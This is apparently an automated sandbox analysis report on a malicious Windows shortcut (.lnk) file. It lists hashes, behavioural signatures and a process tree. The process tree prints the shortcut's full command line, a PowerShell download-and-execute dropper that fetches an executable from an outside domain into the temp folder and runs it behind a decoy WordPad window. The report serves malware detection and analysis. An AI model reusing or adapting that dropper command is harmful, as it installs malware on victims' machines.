Analysis
max time kernel: 148s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02/02/2023, 13:36
Static task: static1
Behavioral task: behavioral1
  Sample: 43843_8439_8329098.lnk
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: 43843_8439_8329098.lnk
  Resource: win10v2004-20220812-en
General
Target: 43843_8439_8329098.lnk
Size: 130KB
MD5: 2fcb95c29131b2bdb9f864f492a3bcd1
SHA1: 7ffa77710ae6a95b3759643852a5a829c550a36e
SHA256: 36a4e3cebb2ed11077cca219e6033a31a60fc8924ed48b79e216d4ceefcc08f5
SHA512: a527d90b15ce7556ae167aba16cfbda8d213b87ec8d2e095ba57060ae7af3315de7bfcbbaddca8e7ad4ff8c7f6a40f5f9e3b8bdea25292a24f2d31740368baa7
SSDEEP: 3072:EE+n8y1Bzt+mwV4jUs8Nu+GEodNn6/f1DaiSGeQnHkJ6U:EE+nPvxwV28NTGEoEAbGXHM6U
Malware Config
(none extracted)

Signatures
Blocklisted process makes network request (1 IoCs)
  flow  pid   Process
  6     5008  powershell.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                Process
  Key value queried  \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation  cmd.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  5008  powershell.exe
  5008  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  5008  powershell.exe

Suspicious use of SetWindowsHookEx (5 IoCs)
  pid   Process
  2132  wordpad.exe
  2132  wordpad.exe
  2132  wordpad.exe
  2132  wordpad.exe
  2132  wordpad.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  description                        pid   Process  procid_target
  PID 3228 wrote to memory of 1648   3228  cmd.exe  80
  PID 3228 wrote to memory of 1648   3228  cmd.exe  80
  PID 1648 wrote to memory of 5008   1648  cmd.exe  81
  PID 1648 wrote to memory of 5008   1648  cmd.exe  81
  PID 1648 wrote to memory of 2132   1648  cmd.exe  82
  PID 1648 wrote to memory of 2132   1648  cmd.exe  82
Processes
(indentation shows the parent/child relationship; each entry lists image path, command line, triggered signatures and PID)

Image: C:\Windows\system32\cmd.exe
Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\43843_8439_8329098.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
PID: 3228

  Image: C:\Windows\System32\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /R set U=http:/&powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"&"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys&C:\Users\Admin\AppData\Local\Temp/Up&g3Jerl:+hqw^-BdjJd&cjM34{_________
    - Suspicious use of WriteProcessMemory
  PID: 1648

    Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    PID: 5008

    Image: C:\Program Files\windows nt\accessories\wordpad.exe
    Command line: "C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys
      - Suspicious use of SetWindowsHookEx
    PID: 2132

Image: C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
PID: 4876